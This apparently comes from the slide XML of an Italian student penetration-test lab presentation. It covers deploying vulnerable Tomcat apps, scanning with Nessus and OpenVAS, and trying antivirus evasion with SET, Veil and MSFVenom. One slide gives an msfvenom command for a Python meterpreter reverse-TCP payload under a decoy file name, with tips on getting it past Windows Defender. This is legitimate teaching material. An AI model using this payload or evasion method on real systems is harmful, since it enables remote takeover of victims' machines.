              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, utilizzabili con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>. Le 2 web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> non sono state create per essere utilizzate come strumenti per esercitazione.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1522412" y="2667000"/>
            <a:ext cx="9601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Possono</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>essere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scaricate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https://studentiunisait-my.sharepoint.com/:f:/g/personal/f_garofalo8_studenti_unisa_it/EskyknYEVhlLkZkzL2EAwYwB4fOnh2HibED5Q_jNOaiQDw?e=dMaFml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Schermata del 2019-07-07 14-55-41.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect t="38889" r="22752" b="33333"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1827212" y="4343400"/>
            <a:ext cx="8857129" cy="1905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Copiare in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>usu.war</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Infiniti.war</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rettangolo 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1217612" y="1905000"/>
            <a:ext cx="1005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Copiare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>usu.war</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Infiniti.war</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> nella cartella “xampp\tomcat\webapps”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Avviare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> da XAMPP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Schermata del 2019-07-07 14-57-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41612" y="3124200"/>
            <a:ext cx="6549706" cy="3733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Avviare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Tomcat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2" y="2362200"/>
            <a:ext cx="3505200" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>È possibile verificare il successo dell’operazione, aprendo con il browser l’indirizzo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://localhost:9999/usu/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://localhost:9999/Infiniti/</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Schermata del 2019-07-07 14-58-13.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect r="32458"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4646612" y="2057400"/>
            <a:ext cx="5928389" cy="3733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Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> Test Report</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Inde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8612" y="1752600"/>
            <a:ext cx="4473388" cy="4338918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7161212" y="4387096"/>
            <a:ext cx="39624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1025" lvl="2" indent="-352425">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" smtClean="0"/>
              <a:t> per la Ricerca di Vulnerabilità</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="581025" lvl="2" indent="-352425">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" smtClean="0"/>
              <a:t> per AV/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>Evasion</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="581025" lvl="2" indent="-352425">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" smtClean="0"/>
              <a:t> per Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="581025" lvl="2" indent="-352425">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" smtClean="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" smtClean="0"/>
              <a:t> Test</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns=""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it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> per la Ricerca di Vulnerabilità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2" y="2514600"/>
            <a:ext cx="2895600" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attraverso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t> ed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenVas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t> è stata effettuata la ricerca di vulnerabilità.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40962" name="Picture 2" descr="Risultati immagini per Nessu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3812" y="4495800"/>
            <a:ext cx="5029200" cy="1424941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40964" name="Picture 4" descr="Risultati immagini per open va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2812" y="1872294"/>
            <a:ext cx="5715000" cy="2166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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> per AV/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Evasion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Social Engineering Toolkit </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto testo 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4494212" y="4953000"/>
            <a:ext cx="6095999" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Con il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Social </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Toolkit è stato creato un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  per Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Reverse_TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" smtClean="0"/>
              <a:t> il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" smtClean="0"/>
              <a:t> non ha avuto successo per la creazione di un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" smtClean="0"/>
              <a:t> per eludere l’antivirus .</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41988" name="Picture 4" descr="Risultati immagini per social engineering toolki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0412" y="1828800"/>
            <a:ext cx="5931877" cy="3213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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> per AV/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Evasion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Veil</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto testo 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379412" y="2057400"/>
            <a:ext cx="3962400" cy="2286000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Creazione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>di</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> un payload Veil con python/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode_inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/aes_encrypt.py, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>il</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> payload è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>stato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>rilevato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>dalle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>difese</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>di</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Windows Defender</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="1d5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4212" y="5562600"/>
            <a:ext cx="6172200" cy="508691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43010" name="Picture 2" descr="Risultati immagini per veil antiviru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7612" y="1905000"/>
            <a:ext cx="5181600" cy="3469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674812" y="457200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Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-I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per AV/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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Evasion</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-I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MSVenom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,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Attacco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5</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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760412" y="1676400"/>
            <a:ext cx="10210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ja-JP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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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 -p python/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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 LHOST=10.0.2.3 LPORT=9090 -f raw &gt; InformazioniRiservate.py</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ja-JP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Immagine 9" descr="1e1.png"/>
          <p:cNvPicPr/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4722812" y="3048000"/>
            <a:ext cx="6705600" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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989012" y="3124200"/>
            <a:ext cx="3352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ja-JP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Modificare</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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kumimoji="0" lang="en-US" altLang="ja-JP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il</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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 payload</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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kumimoji="0" lang="en-US" altLang="ja-JP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inserendo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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 “</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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getpass</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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,” </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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dopo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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kumimoji="0" lang="en-US" altLang="ja-JP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l’import</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ja-JP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Connettore 2 14"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5865812" y="2322731"/>
            <a:ext cx="2209800" cy="725269"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150"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058" name="Picture 2" descr="Risultati immagini per MSFVeno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6612" y="3886200"/>
            <a:ext cx="5791200" cy="2714625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic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7161212" y="4695736"/>
            <a:ext cx="4419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ja-JP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Windows Defender </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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rileva</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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kumimoji="0" lang="en-US" altLang="ja-JP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il</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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 file python solo se </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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si</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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kumimoji="0" lang="en-US" altLang="ja-JP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trova</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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kumimoji="0" lang="en-US" altLang="ja-JP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nella</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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kumimoji="0" lang="en-US" altLang="ja-JP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macchina</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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 locale.  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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Nella</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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kumimoji="0" lang="en-US" altLang="ja-JP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cartella</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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kumimoji="0" lang="en-US" altLang="ja-JP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virtuale</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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kumimoji="0" lang="en-US" altLang="ja-JP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può</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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kumimoji="0" lang="en-US" altLang="ja-JP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essere</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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kumimoji="0" lang="en-US" altLang="ja-JP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eseguito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 per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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creare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altLang="ja-JP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una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 shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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meterprerter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.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ja-JP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Creare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macchina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulnerabile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8610599" cy="990600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Scaricare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Windows 8.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sito</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Microsoft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/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38381"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2894012" y="3442275"/>
            <a:ext cx="5867400" cy="341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674812" y="457200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Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-I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per AV/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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Evasion</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-I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Attacco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6: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aseline="0" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Installazione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> per Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> 10</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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1522412" y="2819400"/>
            <a:ext cx="8763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/>
              <a:t>Download macchina Virtuale: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://developer.microsoft.com/it-it/windows/downloads/virtual-machines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Installa: Python 2.7.16 x86 for Windows: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Installa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Py2exe 32 bits for Python 2.7: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
